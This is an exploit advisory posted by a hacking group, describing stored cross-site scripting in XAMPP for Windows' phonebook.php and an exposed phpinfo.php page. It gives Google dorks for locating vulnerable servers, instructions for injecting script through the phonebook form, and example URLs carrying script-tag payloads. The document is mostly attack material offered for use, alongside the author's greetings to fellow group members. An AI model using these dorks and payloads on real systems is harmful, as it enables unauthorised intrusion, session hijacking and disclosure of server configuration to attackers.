XAMPP for Windows suffers from phpinfo and cross site scripting vulnerabilities. Versions 1.4.9, 1.5.0, 1.5.1, and 1.6.4 are affected.
60935ec6be7f5fb4deb26711efb9b60a04780eda94243ede59b9d4971ca716ab
# XAMPP for Windows (Xss/PHPinfo) Multiple Vulnerability
# AUTHOR : Cru3l.b0y
# DATE : 05 APR 2009
# SITE : WwW.DeltaHacking.Net
# CONTACT : Cru3l.b0y@deltahacking.net
#####################################################
# APPLICATION : XAMPP for Windows
# VERSION : 1.4.9 , 1.5.0 , 1.5.1 , 1.6.4
# DOWNLO : http://www.apachefriends.org/en/xampp-windows.html
# VENDOR : http://www.apachefriends.org/
#####################################################
[+] Xss:
Dork : inurl:"/xampp/phonebook.php"
Exploit :
Vulnerability is in phonebook. First go to site.com/xampp/phonebook.php
now write your script in First name or Phone number box and press ADD. Your script will run successfully.
http://127.0.0.1/xampp/phonebook.php?lastname=Cru3l.b0y&firstname=<script>alert(123);</script>&phone=<script>alert(123);</script>
[+] PHPinfo:
Dork : inurl:"/xampp/phpinfo.php"
Exploit : http://127.0.0.1/xampp/phpinfo.php
##############################################################################################
# Greeting: Dr.Trojan, Sasha, b3hz4d, PLATEN, black.viper and all member in DeltaHacking.Net #
##############################################################################################